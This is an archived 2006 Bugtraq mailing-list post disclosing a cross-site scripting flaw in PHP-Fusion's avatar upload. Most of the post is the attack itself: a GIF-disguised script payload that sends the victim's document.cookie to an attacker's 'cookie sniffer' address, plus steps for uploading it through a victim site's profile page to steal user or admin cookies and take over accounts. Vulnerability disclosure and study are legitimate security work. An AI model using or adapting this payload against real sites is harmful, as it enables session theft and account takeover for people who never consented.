NEOHAPSIS - Peace of Mind Through Integrity and Insight

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com

Neohapsis > Archives > Bugtraq> 2006-07

Php-Fusion (Xss) With Avatar Upload

zeberus_hotmail.com
Date: Sat Jul 01 2006 - 17:26:18 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Hi;

==================
http://php-fusion.co.uk/
==================

Php-Fusion (Xss) With Avatar Upload...

With This Vulnerability, You Are able To Become Any User Who Uses a Browser That
"internet Explorer"(Support Cross Site Scripting), So it is Possible To Become Admin.
Firefox Can't Write..
Admin or User Cookie We Are Able To Take

Php-Fusion İs Avatar Xss By Pass
=================

Our Xss Code :

GIF89a <script>img = new Image(); img.src = "Your Cookies Sniffer Adress Here?"+document.cookie;</script>

So Now We Will Open A NotPat And Put Our Code and Saved With .jpg .gif ....
And Upload A Php-Fusion Site.. http://[victim]/[Php-Fusion]/edit_profile.php

Credits ; ZeberuS & Redworm ZeberuS_hotmail.com | RedwormRedworm.Us ;)

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]